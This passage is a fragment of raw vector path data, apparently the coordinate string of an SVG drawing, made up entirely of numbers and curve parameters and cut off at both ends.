-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.